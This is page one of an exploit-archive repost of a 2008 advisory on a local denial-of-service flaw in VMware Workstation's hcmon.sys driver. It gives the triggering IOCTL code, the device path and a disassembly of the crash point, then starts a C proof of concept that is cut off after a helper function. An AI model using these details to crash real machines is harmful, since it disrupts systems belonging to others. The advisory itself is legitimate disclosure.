Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > Exploit > Content
Hot Articles
MyBulletinBoard (MyBB)
Joomla Component com_con
deV!Lz Clanportal [DZCP]
Discuz! 6.0.1 (searchid)
Boonex Dolphin 6.1.2 Mul
AuraCMS
pmaPWN! - phpMyAdmin Cod
SMF Mod Member Awards 1.
WarFTP 1.65 (USER) Remot
CMailServer 5.4.6 (CMail
VIVOTEK and NUUO Team Up
Mozilla Firefox 3.5 (Fon
OllyDBG v1.10 and ImpREC
Joomla Component com_con
BoonEx Ray 3.5 (sIncPath
Recommend Articles
Safari + Quicktime
CMailServer 5.4.6 (CMail
trixbox (langChoice) Loc
BrewBlogger 2.1.0.1 Arbi
Joomla Component com_con
Mole Group Last Minute S
BoonEx Ray 3.5 (sIncPath
Dreampics Builder (page)
Download Accelerator Plu
OllyDBG v1.10 and ImpREC
DreamNews Manager (id) R
gapicms 9.0.2 (dirDepth)
Million Pixels 3 (id_cat
Maian Cart 1.1 Insecure
Maian Music 1.0 Insecure
New Articles
ARM ifconfig eth0 and As
HP Data Protector Media
Winamp 5.5.8 (in_mod plu
Hanso Converter 1.1.0 .o
Fat Player Media Player
Comet Bird 3.6.10 Crash
PHP Hosting Directory 2.
MySQl 5.1 DLL Hijacking
Opera Denial of Service
Multiple Buffer Overflow
Postcard Mentor - Databa
Catalog Manager Database
My Vacation Tracker DLL
Microsoft Internet Explo
linux/x86 setreuid(0,0)
VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnerability
  Add date: 10/07/2008   Publishing date: 10/07/2008   Hits: 32
Total 3 pages, Current page:1, Jump to page:
 

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - Orange Bat advisory -

Name             : VMWare Workstation (hcmon.sys 6.0.0.45731)
Class            : DoS
Published       : 2008-08-17
Credit        : g_ (g_ # orange-bat # com)

- - Details -

Fails to sanitize pointers sent from usermode with METHOD_NEITHER.

hcmon.sys:

.text:00011606 loc_11606:                             .text:00011606                 mov     eax, [ebp+SystemBuffer]
.text:00011609                 mov     [ebp+SystemBuffer2], eax
.text:0001160C                 mov     ecx, [ebp+SystemBuffer2]
.text:0001160F                 mov     edx, [ecx+0Ch]       <---- BUGCHECK
.text:00011612                 cmp     edx, [ebp+var_20]
.text:00011615                 jnz     short loc_11629
.text:00011617                 cmp     [ebp+NumberOfBytes], 70h
.text:0001161B                 jb      short loc_11629
.text:0001161D                 mov     eax, [ebp+SystemBuffer2]
.text:00011620                 cmp     dword ptr [eax+8], 7FFBh
.text:00011627                 jbe     short loc_11638

This code can be reached by sending 0x8101232B IOCTL to \\.\hcmon
device.

- - Proof of concept -

#include <windows.h>
#include <stdio.h>
#include <ddk/ntifs.h>


void TextError(LPTSTR lpszFunction)
{
   // Retrieve the system error message for the last-error code

   LPVOID lpMsgBuf;
   LPVOID lpDisplayBuf;
   DWORD dw = GetLastError();

   FormatMessage(
       FORMAT_MESSAGE_ALLOCATE_BUFFER |
       FORMAT_MESSAGE_FROM_SYSTEM |

 

Other pages: : 1 * 2 * 3 * Next>>
Prev:FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh) Next:Anzio Web Print Object

Comment:

Category: Home > Exploit
Home